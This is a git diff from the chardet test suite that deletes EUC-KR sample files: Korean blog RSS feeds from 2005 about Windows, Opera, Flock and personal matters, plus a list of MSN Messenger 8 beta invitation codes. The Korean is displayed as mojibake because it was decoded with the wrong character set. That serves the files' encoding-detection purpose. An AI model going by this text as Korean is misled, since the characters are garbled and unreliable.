    -ְ÷»ֱײְַ½ְֳו¿¡¼­ ֱײ´×µח ¼­¹־ֳ‏ְּ ְ־ֵֽ³ְּ¶ץ °ר°£ ¼׃¿¡¼­ ַצ½ַ¿¡¼± ´©¸± ¼צ ¾ר¾ת´ר ¸¹ְ÷ ¸ֳֵ¼¸¦ ֱס±ג°װ ַ״ֱ״´´ֲ°ַ ֱ₪¸» ¸ֵ·ְְֲ־ ְ¯ֵהַַ¾ֶ°¡ ¾ֶ´ׂ±מµµ ַױ´ֿ´¸¸, ְת·± ¸ֳֵ¼µי µ¿¡´ֲ ַַ ¶¡ָך¸®¸ח ³כ·ֲַׁ »ח¶קµיְּ ְײ°ם, ±׳ »ח¶קµיְ÷ ְ½ְֵּ ְַֿׁ ´ס°¡¸¦ ¹ְ» ±ַ¸®°¡ ְײ´´ֲ °ּ´ֿ´. °ב±¹ ְ־ֵֽ³ °ר°£¿¡¼­µµ ְ÷»ֱײְַ·ךְ» ְ¿כ½ֳִׁ¾ַׂ ַ¿ה°¡ ְײ´´ֲ°װ ְתְַ »‎°¢ְװ´ֿ´. ±׳·¸°װ µַ¸י, °¡ֱצֱצ ¸רְַׁ´ֲ ¸¹ְ÷°ֹ ֶק±גַ״¾¸¸ ַֿ°ֱצ¸¸ ¸»ְֱּׂ.
    -
    -ְּ ¿¿¡µµ ¿©·¯°¡ֱצ ³³µזַׂ¼צ ¾ר´ֲ ֱײְוµיְ» ÷¸¸י¼­, ³¹« ְ±ג ְװְו¿¡¼­¸¸ »‎°¢ ַׁ´´ֲ »‎°¢ְּ µי´ץ±÷¿ה. ֱ₪÷־ ֲק¿ר¿¡¼­ ְתְ±ְַּ¶ף´ֲ °³³הְ» ´כ´כְְ¸·־ ָ«÷¸ַׂ ַ¿ה°¡ ְײ´´ֲ »‎°¢µµ µי°ם¿ה.
    -
    -¾מֲ·µח ± ¾²±ג ְ¿¡, ÷׀¸ם ¼ׂ¼צ¸¸ְּ °ר°¨ַׂ ¼צ ְײ´ֲ±ְּ°ם, ´¸¥ ÷׀µי¿¡°װ´ֲ ¿ְָק·ֱ ¹°¨ְ» ֱ¼צ ְײ´ֲ ±ְ׃ְ» ¾ֻ¸י¼­µµ ְּ·±ְת·± ְְּ¯·־ ¹¹‎ַאְ§¸¦ ֱ₪´חָ­ ½ֳֵ°·ֱ´ֲ ÷׀µיְּ ¾ג¹ּ¿צ ְ¾מ ÷ֳ½ְ´ֿ´.]]>
    -NON-COMPUTER - BLAH-BLAH -JWC -Sun, 13 Nov 2005 02:27:10 +0900 -
    - -³×¾ֱֶר´´ֲ °ַ -http://jowchung.oolim.net/index.php?pl=78 - -
    -³²µי°ת ÷ס±³ַֿ¸י ַׁ¾רְּ ֳ¶ףַ״ֱצ´ֲ ³× ְ½ְֵ» ÷¸¸ח ¿­µמ°¨ְ» ´ְ³¥°װ ¾ֶ´ֿ¶ף ¾מֱ¦ְַ ³× ÷¸´ ¿ְ´ְֳַ ³»°¡ ³×¾ֱֶצµµ·ֿ ³כ·ֲַ״¾ ַׁ´.
    -
    -¾מֱ¦ְַ ³×÷¸´ ¿ְ´ְֳַ ³»°¡ ³×¾ֱֶצ´ֲ ³¯ְּ ¸¹¾ֶ ֱת¼צ·ֿ ³×´ֲ ֱ¡ֱ¡ ֳײ°ם°¡ µֹ ¼צ ְײְ»°ְּֽ´.
    -
    -ֱַֿצ¸¸, °ת¿¬ ³»°¡ ֱרֱ₪ ¾מֱ¦ְַ ³×÷¸´ ¿ְ´ְֳַ ³»°¡ ³´´°ם ¸»ְ» ַׂ ¼צ ְײְ»±מ?
    -
    -¿­µמ°¨ְ» ¹צ¸®°ם ¾מֱ¦ְַ ³×÷¸´ ¿ְ´ְֳַ ³»°¡ ³´µµ·ֿ ³כ·ְֲַֿ.]]>
    -NON-COMPUTER - QUOTES -JWC -Tue, 8 Nov 2005 00:09:56 +0900 -
    - -ְ©µµ¿ל ¼­¹צ 2003¿¡¼­ ְ©µµ¿ל XP·־ ֶק¸הַװ -http://jowchung.oolim.net/index.php?pl=77 - -
    -ְ©µµ¿ל 2003ְ» ½ב¿ְ¸י¼­ °£ָ₪ ָ£ָ¯¼÷ ¹®ֱ¦·־ ¿©·¯ ֱַ·־±׳·¥ְ» 'ֶק±ג' ַ״¾µַ´ֲ ְֿµיְּ ¸מֲק·¡ ְײ¾ת¾מ¼­ ְּ¹ר¿£ ְ©µµ¿ל XP·־ ¼³ִ¡¸¦ ַ״ ÷ֳ½ְ´ֿ´.
    -
    -ְֿ´ְ÷ ±גֱ¸ ְ©µµ¿ל ¼­¹צ 2003 ½÷ִֵ´µו ¿µ¹®ֶַ¿¡ ÷סַ״¼­ ֳ₪°¨»ף ÷ׂ¾ֱָ₪ַׁ(?) ´ְ³¦ְּ µל´ֿ´. [¼³ִ¡ ִָ 2¹ר¾¿ְּ³× »¸±גµµ ַ½ְ´ֿ´.]
    -2003ְ» ¸מ´°£ ½ב¿װ´ֲµ¥, ´¿מµַ´ֲ °ז¿ל´ֲ ´ ֲַׁק·¡µµ ¾ר¾ת´רֱצ¶ף.
    -ֶ¯ָק, ¹» ְ¸ר ¸¸ֱ³´ֱֲצ ¸נ¸£°ֱצ¸¸, 2003¿¡¼­ ְ µַ´ר ִ«ֶ®¶ףְּ´ץµµ ַ־ְּ »¡°£»צְ¸·־ ַ¥½ֳµַ¸ח ·¢ְּ ½ַֹֿ´ץ±÷¿ה. ¹זָ­÷®µµ »לֶל÷¸°ם, ¹י½ֵµµ »לֶל ÷ֳ´ֲµ¥ ¹®ֱ¦¸¦ ¸נ¸£°´ץ±÷¿ה. T,.T
    -
    -ֱצ± ְ©µµ XP SP2 ַׁ±ְֶַּ ¼³ִ¡µַ¾מ ְײ´ֲµ¥, ³»ְְּֿ³× ¸נ·¡ֲכ ֶק¸הַֿ°ם XP ¿µ¹®ְֶַ¸·־ ´½ֳ ¼³ִ¡ַֿ´ֲ°ֹ ½ֹ°¢ַֿ°װ °ם·ֱֱ¿¡ ְײ½ְ´ֿ´.
    -[ַׁ±ֶַ ÷¸´´ֲ ¿µ¹®ְֶַּ ¾ֲֳַַֿ°ם ֱֱ´ץ±÷¿ה. 2003µµ ¿µ¹®ְ» »ח¿כ]
    -±׳¶§µµ XP°¡ ¸¶ְ½¿¡ ¾ָµי¸י, ¾מֲ¿¼צ ¾רְּ 2003ְ¸·־ ÷¹±ֽ ַ״¾ֱׂ(...)
    -
    -
    [ַצ XP ½ֳ½÷ֵ ½÷ֵ©¸°¼¦](ֵ¬¸¯½ֳ ָ®´כ µ)

    -
    ]]>
    -NON-COMPUTER - BLAH-BLAH -JWC -Fri, 4 Nov 2005 00:15:17 +0900 -
    - -OKFOTO 5000¿ר±ַ »חֱר ְ־ָ­ ¹«·ב ִםֶש 8ְו °¡ֱ® °¡¼¼¿ה -http://jowchung.oolim.net/index.php?pl=76 - -
    -¼±ֲר¼ר 8÷׀ ¸ױְת °¡ֱ® °¡½ֳ°ם, ֱ₪¸» ַ¿ה ַֿ½ֵµ¥ ´°װ ¿ְ¼ֵ¼­ ¸ר ¹ְ¸½ֵ °ז¿ל ¸ְֿ ֱײ½ֳ¸י ÷¸³» µו¸®°½ְ´ֿ´. [³²¾ֶ ְײ´¸י]
    -
    -
    1. »ח¿כµ
    -
    -2. »ח¿כµ
    -
    -3. »ח¿כµ
    -
    -4. »ח¿כµ
    -
    -5. »ח¿כµ
    -
    -6. »ח¿כµ
    -
    -7. »ח¿כµ
    -
    -8. »ח¿כµ

    -
    -ְֿ ְ־´ח ַׁ°³ ¹¿¡ µמ·ְֿ» ¸רַֿ´ֿ ֲ°ם ַֿ¼¼¿ה. ְ¯ָ¿±ג°£ְ÷ 12¿ש 31ְֿ ±מֱצ ְװ´ֿ´.
    -
    -µמ·ְֿ÷ http://www.okfoto.co.kr °¡¼ֵ¼­ ·־±׳ְ־ ַֿ½ֵµ, MYROOM -> ִםֶש »ח¿כ ÷ס½÷¹«¸®ַׁ °ק¿¡ °¡¼ֵ¼­ ִםֶש ¹רָ£¸¦ ³ײְ¸½ֳ¸י µֻ´ֿ´.]]>
    -COMPUTER - REST -JWC -Tue, 1 Nov 2005 01:05:38 +0900 -
    - -MSN ¸½ְֵת 8 ÷£ֵ¸ ֱַ·־±׳·¥ ֳ´כ ִµו -http://jowchung.oolim.net/index.php?pl=75 -

    -¾ֶ·¡ ±¹°¡ֱ ַ״´חµַ½ֳ´ֲ ±¹°¡ְַ ִµו¸¦ Microsoft Connect ְ¥»חְֶּ®¿¡ °¡¼ֵ¼­ ֳ´כ ִµו¶ץ¿¡ ְװ·ֲַֿ½ֳ°ם °£´ַׁ ¼³¹®ְ» ְ¼÷ַֿ½ֳ¸י MSN ÷£ֵ¸ ֱַ·־±׳·¥¿¡ ֲ¿© ַֿ½ַ¼צ ְײ´ֲ ±גָ¸¸¦ ¾עְ¸½ַ¼צ ְײ½ְ´ֿ´. [Only if ¼±ֳֵ µַ½ֵ´¸י] [SRC: Neowin]
    -
    Austria - AU-B86F-P6HH
    -Australia - AU-X8FG-XWR9
    -Belgium - BE-BFFD-FMV7
    -Brazil - BR-MJYQ-DCRB
    -Canada - CA-8VPP-8W8V
    -China - CH-4PYP-H4D4
    -France - FR-XJGB-JV79
    -Germany - GER-JJBM-9VFY
    -Italy - IT-3FCK-D8XM
    -Israel - ISR-3H7B-F4HP
    -Japan - JA-DT6D-9YCY
    -Korea - KO-9BV2-T2BP
    -Netherlands - NE-3G4X-4M84
    -Portugal - POR-FP8C-9M9F
    -Spain - SP-RKFT-CV2X
    -United Kingdom - UK-HQ69-6JBQ
    -United States - US-64JX-J2HJ

    -
    -ְ¼¼ַׁ ֱ₪÷¸´ֲ ´ְ½ ְְִֶֿ» ֱֲ¶ ַֿ¼¼¿ה.
    Post_101905.doc (37.5 KB)

    -
    -ֳ°¡»חַ׳:
    -Connect ½־ְֶּ®¿¡ MSN Recruitment Program ְּ ָ°¼÷ µַ¾ת´°ם ֱ₪½ְִ¸·־ µמ·ֿµָ°װ ¾ֶ´ֿ°ם, °³÷°·־ Welcome¸ְְּֿ ÷¸³»ֱצ°ם ְּ ¸ְְֿ» ¹ְ¸½ֳ¸י ֱ₪½ִ µמ·ְּֿ µָ°ּ´ֿ´. ±׳¶§±מֱצ´ֲ ½ֳֵ»¸¸ µַ¾מְײ´ֲ »ףֲֵ ְװ´ֿ´.
    -¶ַַׁ, ½־ְֶּ®¿¡ ³×¿ְֽײ´ֲ ¸¸·בְְֿ÷ µמ·ְְֿֿ» ¶זַֿ´ֲ°ֵ °°½ְ´ֿ´. ֱ¦°¡ ְ©µµ¿ל ÷ס½÷ֵ¸ ¹טֵ¸¿¡ ֲ¿©ַֿ°ם ְײ´ֲµ¥ ÷ס½÷ֵ¸ ¹טֵ¸ְַ ¸¸·בְְֿ÷ ְּ¹ֱּצ³­ 7¿ש 18ְֿ·־ ֲןַפ ְײ½ְ´ֿ´. ֱַֿצ¸¸ ¹טֵ¸´ֲ °ט¼׃ ¿ֲ°םְ׳ ְֱּ±¸¿ה.]]>
    -COMPUTER - REST -JWC -Fri, 21 Oct 2005 09:51:39 +0900 -
    - -ֳַ·ֿ[Flock] ֱַ¶ף¿לֱ® Developer Preview -http://jowchung.oolim.net/index.php?pl=74 - -¹°·׀ ְתµµ ¿¹ְ¿¡ °¡ְװְ» ַ״¼­ ¹¾ׂ±¸¿ה.
    -
    -¹ז± ´¿מ¹¾ֶ¼­ ¼³ִ¡¸¦ ַ״ ÷¸¾ׂ´ֲµ¥, ֳ¹ ְ־»ףְ÷ ±²ְוָק ¿¹»³׳¿ה.
    -ֱַֿצ¸¸, ֱ» ¹צ¹ק µַ´ֲ°ֵ °°°ם. ¿©·¯°¡ֱצ IE, ÷ׂ¿©¿ל ±׳¸®°ם ¿ְֶה¶ף¿¡¼­ ÷¸ֱצ ¸רַׁ ½ֵ±גַׁ ±ג´ֹ[¿¹. Blog This] µמְּ ְײ´ֲµ¥ ¾ֱֶק ְּ¿כְ» ַ״÷¸ֱצ´ֲ ¸רַ½ְ´ֿ´.
    -
    -ָ₪½ֳ ֳַ·ְֿ» ֳ₪ַטַ״ ÷¸°ם ½ְֽ¸½ֵ ÷׀µיֱ ֳ´כ ¸ְְֿ» ¹ֱצ ¸רַֿ½ֵ ÷׀ְ÷ ¸ְֿ ÷¸³»½ֳ°ֵ³× ¾ֶ·¡ ִ¸אֶ®¿¡ ¸ְֱֿײ¼ׂ¸¦ ³²°װ ֱײ½ֳ¸י ¿ְ´ְֳּ³× ³»ְֿ ³»·־ ÷¸³» µו¸®µµ·ֿ ַֿ°½ְ´ֿ´. [WIN, LINUX, MAC¿כ ֱ °ם¸£¼¼¿ה]
    -
    -Flock Developer Preview 0.5pre ½÷ֵ©¸°¼¦. [ֵ¬¸¯ַֿ½ֳ¸י ֵ©°װ ÷¸ְ׃]
    -

    -
    -ֳ°¡»חַ׳: ְֿ¸נ¸®´װ ´ה±ְ» ÷¸°ם ָ®ְ־ °ב°ת ±גֱ¸ ְ־ֱץְ» ַ״¾ ´¿מ·־µו¸¦ ¹ְ» ¼צ ְײ¾ת´ֲµ¥, ֱצ±ְ÷ ְ־ֱץ ¾רְּµµ ´¿מ·־µו°¡ °¡´ֹ ַֿ³׳¿ה.
    -http://www.flock.com/developer/ ְּ°ק¿¡ °¡¼ֵ¼­ ¿רַֿ½ֳ´ֲ ֳַ·§ֶ ¼±ֳֵ ַֿ½ֳ¸י µֻ´ֿ´.]]>
    -COMPUTER - BULLETIN -JWC -Fri, 21 Oct 2005 08:26:05 +0900 -
    - -¿ְֶה¶ף, ¹«·ב·־ ְָ¯ֱַׁצ ְֶּ²¸¸¿¡ ¹י¸¸ ´¿מ·־µו µ¹ִֶ! -http://jowchung.oolim.net/index.php?pl=73 -
    3ְְֿ±מֱצ, ¶ףְּ¼¾½÷¸¦ »ח¾ֱצ ±₪°ם ¾ר´ֲ ÷ך¶ף¿לֱ®¸¦ ֱ¦°רַ´ר ¿ְֶה¶ף[Opera] ÷ך¶ף¿לֱ®°¡ ¹«·ב·־ ְָ¯ֱַׁצ ְֶּ²¸¸¿¡ ְֿ¹י¸¸ ´¿מ·־µו¸¦ µ¹ִֶ ַ´°ם ַױ´ֿ´. [1,400,000¸¸ ´¿מ·־µו°¡ ³ׁ¾ת´°ם ַױ´ֿ´.]
    -
    -´כ÷־÷׀ ´¿מ·־µו´ֲ ¿×½ֳ ¸ְְּת ÷ך¶ף¿לֱ®ְ־ IEְ¯ֱ®¿¡°װ¼­ ¹»‎ְ» ַ´ה´ֿ´.
    -
    -ְֶּ²¸¸¿¡ ¹י¸¸¹ר ´¿מ·־µו¶ף¸י,
    -ַֿ·ח¿¡ 50¸¸¹ר, ַׁ½ֳ°£¿¡ 2¸¸ 833¹ר, 1÷׀¿¡ 347¹ר, 1ֳ¿¡ 6¹ר ְּ¶ף´ֲ ¼צִ¡°¡ ³×¿ְ³׳¿ה. ´כ´ַׁ ¼צִ¡°¡ ¾ֶ´ׂ¼צ ¾ר½ְ´ֿ´.... '°רֲ¥[¸¶ֳִֶֹ]'ְַ ְָ÷ ֱ₪¸» ´כ´ַׁ°¡ ÷¾´ֿ´.
    -
    -¿ְֶה¶ף°¡ ¹«·ב·־ ְָ¯ְ» ַֿ¸י¼­, ¾ױְ¸·־ ¿ְֶה¶ף°¡ ¹» ¸װ°ם »לֱצ °ֱֶ₪ ¾ֶ´ׁ °ֱֶ₪ְ» ַ¾ת´ֲµ¥, ¿ְֶה¶ף´ֲ ÷ך¶ף¿לֱ®¿¡ ³»ְוµָ ±¸± °ֻ»צֳ¢(¾ֶ·¡½÷¼¦)¿¡¼­ ¸¹ְ÷ ¼צְְֽ» ¾ע´ֲ´°ם ַױ´ֿ´. [ְ¼¼ַׁ ³»¿כְ÷ ְּ°קְ». via ִם¸¶¸נֵה ְּ¾±ג]

    -°ֵ±ג¿¡´ ¹«·ב¸¦ ¼±¾נ ְַ¸´ֿ, »ח¿כְְַ ¼צ´ֲ »ף½ֲַׂ °ְּֽ°ם, ±׳¿¡ µ¶ף ´ח¿¬ָק ¼צְְֽ÷ ´ץ ֱץ°¡ ַֿ°ֱׂ. ¿ְֶה¶ף°¡ ±¦ָק ¹«·ב·־ ַׁ°װ ¾ֶ´ׁ°¡ ÷¾´ֿ´. ´ ±םְ÷ ְְּ¯°¡ ְײ¾ת³׳¿ה.
    -
    -¾מֲ·µח, ֱ₪¸» ÷¸¥ ÷ך¶ף¿לֱ®, ¿ְֶה¶ף, ָ­ְֳֶּ!
    -±׳·¡¾ IE°¡ µµְ ¹¾ֶ¼­ »¡¶ףֱצֱצ :p]]>
    -COMPUTER - REST -JWC -Fri, 23 Sep 2005 02:43:10 +0900 -
    -
    -
    \ No newline at end of file diff --git a/chardet/tests/EUC-KR/kina.egloos.com.xml b/chardet/tests/EUC-KR/kina.egloos.com.xml deleted file mode 100644 index 1df6d3d..0000000 --- a/chardet/tests/EUC-KR/kina.egloos.com.xml +++ /dev/null @@ -1,206 +0,0 @@ - - - - - ¢½¢¾KINA VIRUS¢¾¢½ - http://kina.egloos.com - ¢ְ ³×¸§´כ·־ ַא÷¹ַֿ´¿ל~¢ְ - ko - Tue, 17 Jun 2003 11:22:05 GMT - - ¢½¢¾KINA VIRUS¢¾¢½ - http://pds.egloos.com/logo/1/200306/17/21/a0000021.jpg - http://kina.egloos.com - 80 - 96 - ¢ְ ³×¸§´כ·־ ַא÷¹ַֿ´¿ל~¢ְ - - - <![CDATA[ ¿ה»ץ~ ¿״ְֿ·־ ¼ױ¿¡ ½ֵ°ז¾²°װµַ³׳.. ]]> - http://kina.egloos.com/783840 - - ¿ְ³־ְ÷ ֲֹ¸ֵ ֱצִ£ ַֿ·ח~ ^-^; ¾מֲקַַ ַ״¾ ְַֿׂ ³»ְֿ·־ ¹ּ·ח°ם.. ִָ´´´ ¶ֳִ ³×¿װ´ .¿ֳ¸¸¿¡ ִ£±¸ ¸¸³× ½ֳ¿רַֿ°װ ¸ֱֶײ ְַׁ ¸¶½ֳ¸ח.. ¼צ´ ¶³¾ת´ץ´ֿ. ֱ» ַַ·־°¡ ַ®¸®´ֲ°ֵ °°±גµµ... ָ~ ₪ׁ₪׀ ₪ׁ
    -
    -¿ה»ץ..ְ²¸¸ ¼ױ¿¡ °½ְֹּ ¸¹¾ֱֶר´... ¸ַ³¯ ¹ֲ¦ ¹ֲ¦ ֲ¥¸£±ג¸¸ ַֿ´ר ¹¶¶׳ַׁ ¼ױֵיµµ.. ¿ה»ץ´ֲ ¿¬ַׁ ¸ֵ´ֵֿ¥¾מ ±מֱצ ַ׳»ף ¹¶ףֱ® ְײ´... ³×¸§´כ·־ ¹°ם ְײ´ֲ ½÷ֶ®·¹½÷..¸¦
    -¼ױְ¸·־ ַ×´ֲ°ֵ ¾ֶ´ׁ°¡ ½ֽ±גµµ ַֿ°ם.. ³×µµ ³×ְּ°¡ µו´ֲ°¡ ½ֽ±גµµ ַֿ´.
    -
    -ִ£±¸°¡ ¾מֱ¦ ְ½ְֵ÷ ³×ְּ°¡ µי¾מ¼­ ְּ» ¸ֵ´ֵֿ¥¾מ°¡ ¹¶ףֱ® ְײ´ֲ °ם¿מ ¼ױְּ°ם ½ֱֽצ¸¸ְ÷ ¾´°ם ַֿ´רµ¥... °ר°¨ְּ °¡´ֲ ְּ¾±ג´. ¼¼¿שְּ ´ְ²¸ֱצ´ֲ ¼ױְּ ÷׀¸ם ¾ֶ¸§´ה´.
    -¾ף¸¶ְ.. »ח°ת ³×¹«(?) ¶ף´ֲ ֱַ·־ ¿¡¼­ ְ¯½ֲ¹־(ֵ¹±¸ ±¹°¡´כַ¥) ¾מ¸׃´ְַֿ ַׁ¸¶µנ ֱ₪µµ ֲ×ְ÷ ¼ױְ÷ ֱ₪¸».. ¹¶ֵ¬ַ´ר ±ג¾ןְּ..
    -(ְ¯½ֲ¹־ְ» ֵ°¿ל±ג ְ§ַ״ ְַֿֿ½ֳ´°¡. ±ג°ט¿¡... ¼ױ°¡¶פְּ ֲ©·ֱ ³×°¬´°ם ַׁ´.. ₪ׁ₪ּ )
    -
    -»ח½ַ ¿ל¸® ¾מ¸׃´ֿ ¼ױְ÷... ¿צ³« ֵכֵכַ״¼­.. (¼ױµµ ÷ס¸¸ְֿ¼צ ְײ´´ֲ°ֹ ÷¸¿©ֱ״´.~^-^;)
    -°ם»‎ ַֿ½ֵ°ֽ¿¡ ÷סַ״ °ִֵ£ ´ְ³¦ְּ ֱ» ִ«¹°¡ µָ´.. ָוָו ¼ױְּ ¾ֱֶײ ÷¹½÷·¯¼­ ³»°¡ ¾ֱֶײ ֱֱ¾ֶ ַׁ´. ₪»
    -³­ ³×ְּ µי¾מ¼­ ¾מ¶² ¼ױְּ µַ¾מ ְײְ»±מ.. »חֱײ ³×¿ֲ´כ·־...°צ°װ.. ֶםַֿ°װ.. »ל¾ֶ °£´¹ָ.. ¼ױ¿¡µµ ½ֵ°ז ¾²¸ח »ל°ֽ °°±גµµ ַֿ°ם.~ ^-^ °©ְ±ג ±ֳ±ַ״ֱצ´ֹ±÷.
    -ְ¼¼ָק ÷¸´ֿ. ³×µµ ¹ת½ב÷־ֵֽ ¼¼¿שְַ ָחְְּ~ ₪» ְַֿֿ´°¡ ±÷µ¥ ±÷µ¥ »‎±ה »ףֳ³µיְּ ¿©·¯°ק ְײ³׳.. ^-^ - ]]> -
    - ¨-₪·-ֱ¾ףֱ¾ף*¨׀ - Mon, 1 Nov 2004 17:19:45 GMT -
    - - <![CDATA[ ¶ׁ¸®¾.~ ]]> - http://kina.egloos.com/744023 - - - ]]> - - ¨*>₪ׁ<*ִ¡ְֱּמ¨׀ - Sun, 3 Oct 2004 15:31:47 GMT - - - <![CDATA[ ´«¿¡ ֱײ»ח¸ֲ´ֹ°ֵ ³ׁ ¾ֶֶ‏. ]]> - http://kina.egloos.com/678283 - - -³ׁ ¾ֶֶ־...!
    -°£ָ£»ח ¾נ´ֿ°¡. ָו¸£´ֲ ´«¹°ְ» ´¾ֱֶײ´ֲµ¥ ֱ» ¹־¸ֱ ַ´ח...
    -ְִֹֿ ´«ֱײְ§¿¡ ¹´ֳ¸¸ ֲס·ֱµµ ¾ֲֶַµ­. ₪׀₪׀ ½ײ°¡ַ® ¼צ¼ת ¾מִֹ ַׂ±מ. ְ¹. ֱרֲ¥ ¾ֳֶַµם.. - ]]> -
    - ¨-₪·-ֱ¾ףֱ¾ף*¨׀ - Tue, 17 Aug 2004 17:31:08 GMT -
    - - <![CDATA[ »לְ» »©¾ ַׁ´... ]]> - http://kina.egloos.com/655614 - - - - ¨-₪·-ֱ¾ףֱ¾ף*¨׀ - Mon, 2 Aug 2004 16:22:41 GMT - - - <![CDATA[ ¿ְ´ֳ... ֲֹ¸.. µµױְּ.~ ]]> - http://kina.egloos.com/594868 - - -¼ר½ִ°£¿¡ ¸ס¼ׂ¸®´ֲ ³פ¾ֶ ֱצ°ם ְ¼¼ָק ÷¸´ֿ ¿״ ְ‏ְ÷ ³²ְ°¡. (¾ֱֶײ ֱ¨ֶ²ַ״ ÷ֶ´ֲ... )
    -³×ְֱּ» ְײ¾מ ÷ֶ´ֲ ¾ֱֶ¸¶ ֵַׁ׳..... ¼¼»ף¿¡¼­ µי¾מ ÷¸ֱצµµ ¸רַׁ ְװ¿¡ ´ד±גµµ ָµח
    -¿ו°ת ... ֱצְת÷׀ַׁ ¸»µיְ» ֲַׁµ¿¾ָ ½¬ֱצ ¾°ם ַֿ°ם ְײ¾ת´..
    -(ְְּ¯´ֲ.. ±׳ ¾ֱֶ¸¶°¡ ¹׀¾ת´´ֲ°ֵ °°ְ÷µ¥..... ₪ׁ,.₪ׁ;;)
    -
    -³»°¡ ¼¼»ף¿¡¼­ ֱ©·־ ½ֳ·¯ ַֿ´ֲ!! ¹צ¸£ְו ¸׃¸® ¾ר´ֲ...³א¼® °°ְ¸´ֿ¶ף±ֳ!! - 0 -^
    -ַׁ´כ ¶§·ֱ ֱײ°ם ½ֽ¾מ¼­ ָ¥³µ´.. ¹צ½÷ ³»¸±¶§ ±מֱ₪...µ¿¡¼­ ¿­¾¾¹ּ ֲ°·ֱ ÷¸¸י¼­... ְײ¾ת´ֲµ¥... (±׳ְֲ÷ ³¯ ÷¸ֱצµµ ¸רַ°ֱצ¸¸... )
    -¸¶ֱצ¸· ³»¸±¶§¿¡´ֲ.. ְ¯ִ¡ֱַֿצ¸¸ ...½ַ¼צ ֳַׁ´ ַֿ¸ח.. »לֲ¦ ¹׀ִ¡°ם ³»·ָ´.....(¹«¼­¿צ¼­.. »ח¾ֲֻ¦¸¸~)
    -
    -±׳°ְֽ¸·־ ³­.. ֳײ¼±ְ» ´ַ״..¾ֱֶ¸¶ ´כ½ֵ ÷¹¼צ¸¦ ַ״ֱ״°ְֽ¸·־ ¸¸ֱ· ַֿ±ג·־ ַ´..
    -- = -;; (¿×½ֳ ³­ ¼ׂ½ַֹ״. ₪ׁ,.₪ׁ)
    -¾ֶ¹«¸® ¿ְ» ±ע²ָק ְװ°ם ְ־¹°ְּ ֱֱ¾ֶµµ...! ±׳·± »ח¶קְ÷ ֱ₪¸» ֱת»צְּ´..!!
    -₪ׁ _-^ ִ¬! ±׳³ֹ.!! ¿ן¾צ¸¶ ֵַׁ׳ ±׳·¨ְ½..! ±ֳ¹°µµ ¾ר¾ת¾מ! - ]]> -
    - ¹ּ÷׀·ש - Fri, 25 Jun 2004 16:54:26 GMT -
    - - <![CDATA[ °םְ־ְַ ¸ם÷¹ְ» ÷ק´ֿ´... ]]> - http://kina.egloos.com/591983 - -
    -¾מֱ¦ »ץ÷® µ¿³׳ ִ£±¸¿ֽ ְַׁ »ח¸י¼­.. ְּ¶ףֵ©ְ־ְַ ְָ₪¼÷¿¡ °ַׁ ֳז°ְְ־.. ְּ¾±ג¸¦ µי¾ת½ְ´ֿ´...
    -¸¾ְּ ³¹«¾ִֶֶ ´«¹°ְּ ¿׀ִ¬ ³×´ץ±÷¿ה....
    -ֽ÷±ט¼±ְֿ´װ. »ן°¡ °םְ־ְַ ¸ם÷¹ְ» ÷ק´ֿ´... - ]]> -
    - ¹ּ÷׀·ש - Thu, 24 Jun 2004 04:58:42 GMT -
    - - <![CDATA[ ¹ד±¹«. ]]> - http://kina.egloos.com/580374 - - -

    -

    -ֱ‎¿¡°¡´ֲ±ז¿¡ °ַ¹°ְ» ¿ֳ·ֱ´ ÷¸¾ׂ´.. ְּ½ֳ°£ ±מֱצ ¹«½¼ ְְֿ» ַֿ°ם ְײ´ֲ°ֹ±מ....
    -
    -¾מ¸±¶§¿£ .. ¹ד±¹«¿¡ ´כַׁ ָ¯»ףְּ ְײ¾ת´....
    -
    -´µי ֵנ±ַׁ ½ֳ°¢...
    -(¹ט°זְ½¾ְַ÷ ¹«¾נ°¡ ½ְֳ ַֿ´ֲ ´ְ³¦ְַ ¼³·¹ְּ´ֲ µםַׁ ְ½¾ְַּ ±ע·ֱ¾ ַׁ´..)
    -÷¹ְוְ÷ ¾דְ÷ ³²¹ז¿¡.. »װֵ׳¸¦ ¸½÷·´°װ »לֲ¦ ²¸¾ ַֿ°ם
    -½÷ִִֹ¡ַׁ°ְּֽ³× ½ֳ¾ָ ³×¿ֲ °ֽµיְ» ֲ ´ֳ¾מ ¶·ֱ ³ץְ÷ִָ .... °ם¹־¿¡ ÷ֱצ°ם ....
    -
    -ֱצ± ±׳·±´¸י ¾מ¶°ִֹ µֹ±מ......
    -(¾ֶ¸¶..¸נµ־ ¹«¼­¿צ ַֿ°ֱצ...ַ״÷¸°ם ½ֽ¾תֱצ¸¸ ֲ±ג·־ ְַֿ-0 - )

    -
    -
    -
    - - ]]> -
    - ¨*>₪ׁ<*ִ¡ְֱּמ¨׀ - Thu, 17 Jun 2004 16:56:27 GMT -
    - - <![CDATA[ ָל.. ]]> - http://kina.egloos.com/578530 - - -ִ¿ַַ¸¦ ¸¶½ֳ°ם »‎°¢¿¡ ְב° ְײְ»¶§°¡ ³×¿¡°ױ °¡ְו ´ְ³¦ְֱֱ÷ ½ֳ°£ְּ ¾ֶ´ׂ±מ... ½ֽ´.
    - ]]> -
    - ¹ּ÷׀·ש - Wed, 16 Jun 2004 19:11:14 GMT -
    - - <![CDATA[ ְב½ֳ... ¾ָ³חָק.... ]]> - http://kina.egloos.com/524744 - - - - ¨-₪·-ֱ¾ףֱ¾ף*¨׀ - Thu, 20 May 2004 17:27:08 GMT - - - <![CDATA[ ³×µµ ַ״¹¾ֱצ~ ]]> - http://kina.egloos.com/515053 - - ¼ײֱקַ״ֱ®÷¸ְ~
    -neo´װְַ ְּ±·ח½÷¿¡ °¬´°¡ µ¶ףְ¾מ÷½~(³ׁ µ÷ְֿ־°¡ ~ ִ¼ִ¼)
    -
    -
    -ֳ³ְ½ ¹«¾נ°¡¿¡ ֱµ¶µָ°װ
    -- ¾מ´ְ¼ר°£ְ־°¡ ÷־ֵֽ ¿ְ÷¿ֽ ³×¿¡°װ ³«¼­°¡ ֱµ¶ ֳ³·³ µַ¾מ¹צ·ָ´. ¹°·׀ µׁ´
    -¿©ְָק ֱµ¶ְּ´.
    -
    -ֳ³ְ½ ´ד¹ט¶ץ°ֹ ¾ֻ°װµָ°װ
